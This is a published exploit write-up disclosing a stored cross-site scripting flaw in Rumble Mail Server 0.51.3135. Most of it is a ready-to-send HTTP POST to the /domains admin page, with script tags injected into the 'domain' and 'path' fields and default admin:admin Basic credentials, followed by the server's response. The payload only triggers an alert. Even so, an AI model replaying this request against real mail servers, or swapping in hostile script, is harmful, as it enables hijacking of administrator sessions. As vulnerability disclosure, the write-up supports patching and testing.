# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS # Date: 2020-9-3 # Exploit Author: Mohammed Alshehri # Vendor Homepage: http://rumble.sf.net/ # Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe # Version: Version 0.51.3135 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Info The parameters `domain` and `path` are vulnerable to stored XSS. # Exploit: POST /domains HTTP/1.1 Host: 127.0.0.1:2580 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 119 Origin: http://127.0.0.1:2580 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert( Upgrade-Insecure-Requests: 1 domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true HTTP/1.1 200 OK Connection: close Content-Type: text/html RumbleLua
RumbleLua on a
Rumble Mail Server v/0.51.3135
Server status Domains & accounts RumbleLua users Server settings Set up modules System logs Mail queue

Domains

Create a new domain
Domain has been created.
Domain name:
Optional alt. storage path:





 

DomainActions
 "> &delete=true">

Powered by Rumble Mail Server - [wiki] [project home]